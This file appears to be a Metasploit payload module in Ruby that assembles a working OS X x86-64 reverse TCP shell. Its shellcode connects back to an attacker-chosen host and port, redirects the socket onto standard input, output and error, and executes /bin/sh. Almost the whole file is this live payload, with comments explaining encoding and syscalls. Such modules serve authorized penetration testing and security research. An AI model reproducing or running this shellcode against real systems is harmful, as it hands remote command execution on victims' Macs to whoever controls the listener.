##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
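# OS X x86-64 reverse TCP command shell, built as a single-stage payload.
#
# The shellcode is assembled at generate() time from the datastore and does:
#   socket(AF_INET, SOCK_STREAM, 0)
#   connect(fd, {LHOST, LPORT}, 16)
#   dup2(fd, 2); dup2(fd, 1); dup2(fd, 0)
#   execve(CMD, [CMD, NULL], NULL)
module MetasploitModule
  # Size of the shellcode produced with the default options (CMD=/bin/sh).
  # A longer CMD string yields a proportionally larger payload.
  CachedSize = 128

  include Msf::Payload::Single
  include Msf::Payload::Osx
  include Msf::Sessions::CommandShellOptions

  # Bytes that must not appear in CMD: the path is spliced into a Metasm
  # `db "..."` literal, where a double quote ends the literal early and a
  # backslash is (presumably) read as an escape by the assembler's string
  # lexer, while an embedded NUL would make execve(2) see a truncated path.
  CMD_FORBIDDEN = /["\\\x00]/.freeze

  # Register the payload metadata and its options.
  #
  # @param info [Hash] module info merged over the defaults below
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'OS X x64 Shell Reverse TCP',
        'Description' => 'Connect back to attacker and spawn a command shell',
        'Author' => 'nemo <nemo[at]felinemenace.org>',
        'License' => MSF_LICENSE,
        'Platform' => 'osx',
        'Arch' => ARCH_X64,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShellUnix
      )
    )

    # CMD is handed directly to execve(2) as the program path, with
    # argv = [CMD] and a NULL environment (see the execve block in
    # generate). It is NOT interpreted by a shell, so it must be the path
    # of an executable, not a command line with arguments.
    register_options(
      [
        OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ]),
        Opt::LHOST,
        Opt::LPORT(4444)
      ]
    )
  end

  # Assemble the reverse-shell machine code for the current datastore.
  #
  # @param _opts [Hash] unused; accepted to satisfy the payload interface
  # @return [String] raw x86-64 shellcode
  # @raise [ArgumentError] if LHOST is not a dotted-quad IPv4 address,
  #   LPORT is outside 1..65535, or CMD is empty or contains a double
  #   quote, backslash or NUL byte
  def generate(_opts = {})
    lhost = datastore['LHOST'] || '127.0.0.1'
    # OptAddress also accepts hostnames and IPv6 literals, but the hard-coded
    # sockaddr_in below is IPv4-only; anything else would encode as garbage.
    unless Rex::Socket.is_ipv4?(lhost)
      raise ArgumentError, 'LHOST must be in IPv4 format.'
    end

    lport = datastore['LPORT'].to_i
    # pack('v') keeps only the low 16 bits, so an out-of-range port would
    # silently connect back to the wrong port instead of failing here.
    unless (1..65_535).cover?(lport)
      raise ArgumentError, 'LPORT must be between 1 and 65535.'
    end

    cmd_path = datastore['CMD'].to_s
    # Fail up front with a clear message (as the LHOST check does) rather
    # than with an opaque assembler error or a payload that execs nothing.
    if cmd_path.empty? || cmd_path.match?(CMD_FORBIDDEN)
      raise ArgumentError, 'CMD must be a non-empty path without double quotes, backslashes or NUL bytes.'
    end
    # Explicit terminator; the `db` line below adds a second one, which is
    # harmless and kept so the emitted bytes (and CachedSize) are unchanged.
    cmd = cmd_path + "\x00"

    # The sockaddr_in is materialised as a single 64-bit immediate. Its low
    # dword lands first in memory after `push rsi`, so the struct reads as
    # bytes 0x02, 0x00, port (network order), then the IPv4 address.
    # NOTE(review): that places 0x02 at sin_len and 0x00 (AF_UNSPEC) at
    # sin_family rather than the textbook 0x00/AF_INET. The module has
    # shipped this way, presumably because the XNU connect() path normalises
    # both fields for AF_INET sockets -- confirm before "fixing" the order.
    encoded_port = [lport, 2].pack('vn').unpack1('N')
    encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')
    encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })

    # Stage by stage (BSD syscall numbers carry the 0x2000000 class prefix):
    #   0x2000061 socket(AF_INET=2, SOCK_STREAM=1, 0); fd saved in r12
    #   0x2000062 connect(fd, rsp -> sockaddr_in, 0x10)
    #   0x200005a dup2(fd, 2 / 1 / 0) so the socket becomes stderr/stdout/stdin
    #   0x200003b execve(path, [path, NULL], NULL); `call load_cmd` leaves the
    #             address of the inline `db` string on the stack, and
    #             `pop rdi` recovers it without any absolute addressing.
    # Connect/dup2 failures are not checked; the shellcode simply continues.
    shell_asm = %(
      mov eax,0x2000061
      push 0x2
      pop rdi
      push 0x1
      pop rsi
      xor rdx,rdx
      syscall
      mov r12,rax
      mov rdi,rax
      mov eax,0x2000062
      xor rsi,rsi
      push rsi
      mov rsi, #{encoded_host_port}
      push rsi
      mov rsi,rsp
      push 0x10
      pop rdx
      syscall
      mov rdi,r12
      mov eax,0x200005a
      mov rsi,2
      syscall
      mov eax,0x200005a
      mov rsi,1
      syscall
      mov eax,0x200005a
      mov rsi,0
      syscall
      xor rax,rax
      mov eax,0x200003b
      call load_cmd
      db "#{cmd}", 0x00
      load_cmd:
      pop rdi
      xor rdx,rdx
      push rdx
      push rdi
      mov rsi,rsp
      syscall
    )

    Metasm::Shellcode.assemble(Metasm::X64.new, shell_asm).encode_string
  end
end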